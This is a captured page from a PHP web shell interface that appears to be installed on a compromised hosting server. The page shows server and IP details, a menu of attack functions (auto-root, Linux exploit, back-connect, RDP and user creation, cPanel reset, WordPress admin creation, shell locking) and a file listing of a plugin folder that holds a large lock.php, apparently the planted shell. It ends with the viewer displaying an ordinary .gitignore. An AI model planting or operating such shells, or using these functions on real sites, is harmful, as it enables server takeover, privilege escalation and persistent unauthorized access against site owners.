Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.7.46
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
filter /
filtercodes /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
thirdparty
[ DIR ]
drwxr-xr-x
.gitignore
7.32
KB
-rw-r--r--
CHANGELOG.md
26.14
KB
-rw-r--r--
CODE_OF_CONDUCT.md
5.14
KB
-rw-r--r--
CONTRIBUTING.md
2.13
KB
-rw-r--r--
LICENSE.txt
31.71
KB
-rw-r--r--
README.md
120.03
KB
-rw-r--r--
SECURITY.md
137
B
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
composer.json
684
B
-rw-r--r--
filter.php
1.11
KB
-rw-r--r--
lib.php
2.13
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
phpcs.xml.dist
239
B
-rw-r--r--
settings.php
1.24
KB
-rw-r--r--
styles.css
1.89
KB
-rw-r--r--
thirdpartylibs.xml
246
B
-rw-r--r--
version.php
1.26
KB
-rw-r--r--
wishlist.php
2.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .gitignore
##### Only include English /lang/* !/lang/en ##### Windows # Windows thumbnail cache files Thumbs.db Thumbs.db:encryptable ehthumbs.db ehthumbs_vista.db # Dump file *.stackdump # Folder config file [Dd]esktop.ini # Recycle Bin used on file shares $RECYCLE.BIN/ # Windows Installer files # Windows Installer files *.cab *.msi *.msix *.msm *.msp # Windows shortcuts *.lnk ##### Linux *~ # temporary files which can be created if a process still has a handle open of a deleted file .fuse_hidden* # KDE directory preferences .directory # Linux trash folder which might appear on any partition or disk .Trash-* # .nfs files are created when an open file is removed but is still being accessed .nfs* ##### MacOS # General .DS_Store .AppleDouble .LSOverride # Icon must end with two \r Icon # Thumbnails ._* # Files that might appear in the root of a volume .DocumentRevisions-V100 .fseventsd .Spotlight-V100 .TemporaryItems .Trashes .VolumeIcon.icns .com.apple.timemachine.donotpresent # Directories potentially created on remote AFP share .AppleDB .AppleDesktop Network Trash Folder Temporary Items .apdisk ##### Test file. test.php ##### SQL file. *.sql *.sqlite ##### Data files *.csv ##### Archive files *.zip *.gz *.tar *.tgz *.7z ##### dotenv – Application environment constants *.env ##### Backup *.bak *.bakup *.gho *.old *.ori *.orig *.original *.tmp *.temp ##### Git Patches *.patch ##### GPG secring.* ##### Dropbox # Dropbox .dropbox .dropbox.attr .dropbox.cache ##### SynopsysVCS # Waveform formats *.vcd *.vpd *.evcd *.fsdb # Default name of the simulation executable. A different name can be # specified with this switch (the associated daidir database name is # also taken from here): -o <path>/<filename> simv # Generated for Verilog and VHDL top configs simv.daidir/ simv.db.dir/ # Infrastructure necessary to co-simulate SystemC models with # Verilog/VHDL models. An alternate directory may be specified with this # switch: -Mdir=<directory_path> csrc/ # Log file - the following switch allows specifying the file that will be # used to write all messages from the simulation: -l <filename> *.log error_log error.log # Coverage results (generated with urg) and database location. The # following switch can also be used: urg -dir <coverage_directory>.vdb simv.vdb/ urgReport/ # DVE and UCLI related files. DVEfiles/ ucli.key # When the design is elaborated for DirectC, the following file is created # with declarations for C/C++ functions. vc_hdrs.h ##### SVN .svn/ ##### Mercurial .hg/ .hgignore .hgsigs .hgsub .hgsubstate .hgtags ##### Bazaar .bzr/ .bzrignore ##### CVS /CVS/* **/CVS/* .cvsignore */.cvsignore ##### TortoiseGit # Project-level settings /.tgitconfig ##### PuTTY # Private key *.ppk ##### VIM # Swap [._]*.s[a-v][a-z] !*.svg # comment out to include vector files in your project [._]*.sw[a-p] [._]s[a-rt-v][a-z] [._]ss[a-gi-z] [._]sw[a-p] # Session Session.vim Sessionx.vim Temporary .netrwhist *~ # Auto-generated tag files tags # Persistent undo [._]*.un~ ##### Emacs # -*- mode: gitignore; -*- *~ \#*\# /.emacs.desktop /.emacs.desktop.lock *.elc auto-save-list tramp .\#* # Org-mode .org-id-locations *_archive # flymake-mode *_flymake.* # eshell files /eshell/history /eshell/lastdir # elpa packages /elpa/ # reftex files *.rel # AUCTeX auto folder /auto/ # cask packages .cask/ dist/ # Flycheck flycheck_*.el # server auth directory /server/ # projectiles files .projectile # directory configuration .dir-locals.el # network security /network-security.data ##### SublimeText # Cache files for Sublime Text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache # Workspace files are user-specific *.sublime-workspace # Project files should be checked into the repository unless a significant # proportion of contributors will probably not be using Sublime Text # *.sublime-project # SFTP configuration file sftp-config.json sftp-config-alt*.json # Package control specific files Package Control.last-run Package Control.ca-list Package Control.ca-bundle Package Control.system-ca-bundle Package Control.cache/ Package Control.ca-certs/ Package Control.merged-ca-bundle Package Control.user-ca-bundle oscrypto-ca-bundle.crt bh_unicode_properties.cache # Sublime-github package stores a GitHub token in this file # https://packagecontrol.io/packages/sublime-github GitHub.sublime-settings ##### TextMate *.tmproj *.tmproject tmtags ##### VisualStudioCode .vscode/ .vscode/* !.vscode/settings.json !.vscode/tasks.json !.vscode/launch.json !.vscode/extensions.json *.code-workspace # Local History for Visual Studio Code .history/ ##### NetBeans **/nbproject/private/ **/nbproject/Makefile-*.mk **/nbproject/Package-*.bash build/ nbbuild/ dist/ nbdist/ .nb-gradle/ ##### JetBrains # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 # User-specific stuff .idea/**/workspace.xml .idea/**/tasks.xml .idea/**/usage.statistics.xml .idea/**/dictionaries .idea/**/shelf # Generated files .idea/**/contentModel.xml # Sensitive or high-churn files .idea/**/dataSources/ .idea/**/dataSources.ids .idea/**/dataSources.local.xml .idea/**/sqlDataSources.xml .idea/**/dynamic.xml .idea/**/uiDesigner.xml .idea/**/dbnavigator.xml ##### Eclipse .metadata bin/ tmp/ *~.nib local.properties .settings/ .loadpath .recommenders ##### Dreamweaver # DW Dreamweaver added files _notes _compareTemp configs/ dwsync.xml dw_php_codehinting.config *.mno # External tool builders .externalToolBuilders/ # Locally stored "Eclipse launch configurations" *.launch # PyDev specific (Python IDE for Eclipse) *.pydevproject # CDT-specific (C/C++ Development Tooling) .cproject # CDT- autotools .autotools # Java annotation processor (APT) .factorypath # PDT-specific (PHP Development Tools) .buildpath # sbteclipse plugin .target # Tern plugin .tern-project # TeXlipse plugin .texlipse # STS (Spring Tool Suite) .springBeans # Code Recommenders .recommenders/ # Annotation Processing .apt_generated/ .apt_generated_test/ # Scala IDE specific (Scala & Java development for Eclipse) .cache-main .scala_dependencies .worksheet # Uncomment this line if you wish to ignore the project description file. # Typically, this file would be tracked if it contains build/dependency configurations: #.project ##### Dreamweaver # DW Dreamweaver added files _notes _compareTemp configs/ dwsync.xml dw_php_codehinting.config *.mno ##### CodeKit # General CodeKit files to ignore config.codekit config.codekit3 /min #### Gradle .gradle **/build/ !src/**/build/ # Ignore Gradle GUI config gradle-app.setting # Avoid ignoring Gradle wrapper jar file (.jar files are usually ignored) !gradle-wrapper.jar # Cache of project .gradletasknamecache # # Work around https://youtrack.jetbrains.com/issue/IDEA-116898 # gradle/wrapper/gradle-wrapper.properties ##### Composer composer.phar /vendor/ # Commit your application's lock file https://getcomposer.org/doc/01-basic-usage.md#commit-your-composer-lock-file-to-version-control # You may choose to ignore a library lock file https://getcomposer.org/doc/02-libraries.md#lock-file composer.lock ##### PHP CodeSniffer # gitignore for the PHP Codesniffer framework # website: https://github.com/squizlabs/PHP_CodeSniffer # # Recommended template: PHP.gitignore /wpcs/* ##### SASS .sass-cache/ *.css.map *.sass.map *.scss.map
Close